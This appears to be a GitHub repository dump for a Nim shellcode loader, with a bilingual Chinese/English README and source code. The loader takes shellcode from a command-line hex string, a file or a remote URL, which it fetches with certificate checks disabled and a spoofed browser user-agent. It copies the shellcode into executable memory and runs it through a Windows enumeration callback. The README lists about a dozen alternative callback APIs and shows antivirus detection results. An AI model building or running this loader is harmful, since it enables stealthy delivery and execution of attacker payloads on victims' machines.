├── README.md ├── dll_you_maybe_need ├── libcrypto-1_1-x64.dll ├── libenchant.dll ├── libpq.dll ├── libsasl.dll ├── libsodium.dll ├── libssh2.dll ├── libssl-1_1-x64.dll └── readme.md ├── image ├── 1.gif ├── 2.gif ├── 3.gif ├── 4.png ├── 5.png └── 6.png ├── shellcode_loader.exe └── shellcode_loader.nim /README.md: -------------------------------------------------------------------------------- 1 | # nim_shellloader 2 | 3 | 详见以下: 4 | details: 5 | # usage 6 | ``` 7 | loader.exe payload.bin 8 | loader.exe (yourshellcode) 9 | loader.exe (http://xxxx/xxx) 10 | ``` 11 | put your url/bin/shellcode direct 12 | 后面直接跟shellcode内容 或者bin文件名 或者网址就行 13 | 14 | 15 | ①use shellcode: 16 | 17 | ![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/1.gif) 18 | 19 | ②use bin file 20 | 21 | 使用bin文件加载shellcode 22 | 23 | ![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/2.gif) 24 | 25 | ③ load the shellcode which on your server(remote load) 26 | 加载你服务器上的shellcode 27 | 28 | ![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/3.gif) 29 | 30 | Besides,You can load shellcode which on your reposiotory(gitee,github,etc.) like this 31 | 32 | 此外 你还可以把shellcode放在github,gitee的地方让loader去读 33 | 34 | ![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/4.png) 35 | 36 | Notice:You must remove '\x' on your shellcode 37 | 38 | 注意:你必须去除你shellcode中的 \x 39 | 40 | ![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/5.png) 41 | 42 | 43 | 查杀情况 44 | 45 | 46 | ![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/6.png) 47 | 48 | # 编译 compile 49 | 50 | step1: setup require 安装所需的库 51 | ``` 52 | nimble install https://github.com/khchen/winim 53 | nimble install https://github.com/status-im/nim-stew 54 | ``` 55 | step2: generate exe 生成exe 56 | ``` 57 | nim c --cpu:i386 -d:mingw -d:ssl --opt:size shellcode_loader.nim 58 | ``` 59 | # Advise 建议 60 | windows上编译容易出现玄学问题 可以用debian11交叉编译 不过记得要装mingw 61 | 62 | 63 | It's easy to have problem if you compile it on Windows Platform.In my opion,you'd better compile it on Linux 64 | 65 | 66 | 如果出现 :```could not load:(libcrypto-1_1|libeay32).dll``` 67 | If Go wrong with :```could not load:(libcrypto-1_1|libeay32).dll``` 68 | 69 | 考虑是运行的平台问题 因为编译的时候i386是x86的 所以出现这个问题就把i386换成amd64 70 | 71 | I consider this is because of the wrong command(it didn't match target's platform ),so please change "i386" to "amd64",like following 72 | 73 | ``` 74 | nim c --cpu:amd64 -d:mingw -d:ssl --opt:size shellcode_loader.nim 75 | ``` 76 | 77 | If it is compiled on windows, you don't need to add ```-d:mingw``` 78 | 79 | 如果是windows上编译 则可以不用加```-d:mingw``` 80 | ## 你可能会在运行这个加载器上出现问题 如果你出现 81 | ## It's possible that the shellcode_loader will go wrong with: 82 | could not load: (libcrypto-1_1-x64|libeay64).dll 83 | 84 | 你可能需要解决这些库 85 | 86 | That means you maybe need to solve these dll 87 | ``` 88 | libcrypto-1_1-x64.dll 89 | 90 | libenchant.dll 91 | 92 | libpq.dll 93 | 94 | libsasl.dll 95 | 96 | libsodium.dll 97 | 98 | libssh2.dll 99 | 100 | libssl-1_1-x64.dll 101 | ``` 102 | You can find them under the floder which belong to PHP 103 | 104 | 这些库可以在windows下 php环境中找到 105 | 106 | Also , you can download them on the Internet 107 | 也可以从网上下载 108 | 109 | 110 | ## 源码中的EnumSystemGeoID回调函数可以换成以下函数 等价 111 | ## The callback function named "EnumSystemGeoID" in my source can be replaced with following function 112 | ``` 113 | # Callback execution 114 | EnumSystemGeoID(GEOCLASS_NATION,0,cast[GEO_ENUMPROC](rPtr)) #① 115 | EnumChildWindows(cast[HWND](nil),cast[WNDENUMPROC](rPtr),cast[LPARAM](nil))#② 116 | EnumDateFormatsA(cast[DATEFMT_ENUMPROCA](rPtr) , LOCALE_SYSTEM_DEFAULT, cast[DWORD](0))#③ 117 | EnumDesktopsW(GetProcessWindowStation(),cast[DESKTOPENUMPROCW](rPtr), cast[LPARAM](nil))#④ 118 | EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()),cast[WNDENUMPROC](rPtr), cast[LPARAM](nil))#⑤ 119 | EnumSystemCodePagesA(cast[CODEPAGE_ENUMPROCA](rPtr) ,0)#⑥ 120 | EnumSystemCodePagesW(cast[CODEPAGE_ENUMPROCW](rPtr), CP_INSTALLED)#⑦ 121 | EnumSystemLanguageGroupsA(cast[LANGUAGEGROUP_ENUMPROCA](rPtr),LGRPID_SUPPORTED,0)#⑧ 122 | EnumSystemLocalesA(cast[LOCALE_ENUMPROCA](rPtr) ,nil)#⑨ 123 | EnumThreadWindows(0,csat[WNDENUMPROC](rPtr),0) #⑩ 124 | EnumUILanguagesA(cast[UILANGUAGE_ENUMPROCA](rPtr), MUI_LANGUAGE_ID, 0)#11 125 | EnumWindows(cast[WNDENUMPROC](rPtr), cast[LPARAM](nil))#12 126 | ``` 127 | -------------------------------------------------------------------------------- /dll_you_maybe_need/libcrypto-1_1-x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/dll_you_maybe_need/libcrypto-1_1-x64.dll -------------------------------------------------------------------------------- /dll_you_maybe_need/libenchant.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/dll_you_maybe_need/libenchant.dll -------------------------------------------------------------------------------- /dll_you_maybe_need/libpq.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/dll_you_maybe_need/libpq.dll -------------------------------------------------------------------------------- /dll_you_maybe_need/libsasl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/dll_you_maybe_need/libsasl.dll -------------------------------------------------------------------------------- /dll_you_maybe_need/libsodium.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/dll_you_maybe_need/libsodium.dll -------------------------------------------------------------------------------- /dll_you_maybe_need/libssh2.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/dll_you_maybe_need/libssh2.dll -------------------------------------------------------------------------------- /dll_you_maybe_need/libssl-1_1-x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/dll_you_maybe_need/libssl-1_1-x64.dll -------------------------------------------------------------------------------- /dll_you_maybe_need/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /image/1.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/image/1.gif -------------------------------------------------------------------------------- /image/2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/image/2.gif -------------------------------------------------------------------------------- /image/3.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/image/3.gif -------------------------------------------------------------------------------- /image/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/image/4.png -------------------------------------------------------------------------------- /image/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/image/5.png -------------------------------------------------------------------------------- /image/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/image/6.png -------------------------------------------------------------------------------- /shellcode_loader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sh3d0ww01f/nim_shellloader/b9d9fc1757d539e31c938a4bb324152b877d62df/shellcode_loader.exe -------------------------------------------------------------------------------- /shellcode_loader.nim: -------------------------------------------------------------------------------- 1 | import httpclient 2 | import streams 3 | import os 4 | import strutils 5 | import winim/lean 6 | import stew/byteutils 7 | import net 8 | proc shellcodeCallback(shellcode: openarray[byte]): void = 9 | echo "[*] T00ls.cc Nim-shellcode-loader shadowwolf" 10 | let CurrentProcess = GetCurrentProcessId() 11 | echo "[*] Target Process: ", CurrentProcess 12 | echo "[*] Length Of Shellcode: ", len(shellcode) 13 | echo "[+] Injecting!" 14 | discard """ 15 | T00ls.cc 14454-shadowwolf 16 | """ 17 | # Application for memory 18 | let rPtr = VirtualAlloc( 19 | nil, 20 | cast[SIZE_T](shellcode.len), 21 | MEM_COMMIT, 22 | PAGE_EXECUTE_READ_WRITE 23 | ) 24 | 25 | # Copy Shellcode to the allocated memory section 26 | copyMem(rPtr,unsafeAddr shellcode,cast[SIZE_T](shellcode.len)) 27 | 28 | # Callback execution 29 | EnumSystemGeoID( 30 | 16, 31 | 0, 32 | cast[GEO_ENUMPROC](rPtr) 33 | ) 34 | proc RequestGet(url:string,header={"user-agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"}):string= 35 | type 36 | sslContext=ref object 37 | var 38 | client = newHttpClient(sslContext=newContext(verifyMode=CVerifyNone)) 39 | RequestHeaders=newHttpHeaders(header) 40 | resp=client.request(url,headers=RequestHeaders) 41 | return resp.bodyStream.readAll().replace("\\x"," ").replace(",","").replace(" ","") 42 | #To get the shellcode on the website you put on 43 | proc GetShellcodeAndRun(para:string):void= 44 | if("http" in para): 45 | echo "[*] Get the shellcode on the website:"¶ 46 | let resp=RequestGet(para)#Get the shellcode on your website 47 | var shellcode = newSeq[byte](len(resp) div 2)#calc the length 48 | hexToByteArray(resp, shellcode)#convert hex string into array 49 | shellcodeCallback(shellcode)#execute 50 | elif fileExists(para): 51 | echo "[*] Get the file:"¶ 52 | var 53 | filename = para 54 | file: File 55 | file = open(filename, fmRead) 56 | var fileSize = file.getFileSize() 57 | var shellcode = newSeq[byte](fileSize) 58 | discard file.readBytes(shellcode, 0, fileSize) 59 | file.close() 60 | shellcodeCallback(shellcode) 61 | else: 62 | echo "[*] Get the string:"¶ 63 | var hexstr: string = para 64 | var shellcode = newSeq[byte](len(hexstr) div 2) 65 | hexToByteArray(hexstr, shellcode) 66 | shellcodeCallback(shellcode) 67 | if paramCount()>=1: 68 | var para:string=paramStr(1) 69 | GetShellcodeAndRun(para) 70 | 71 | --------------------------------------------------------------------------------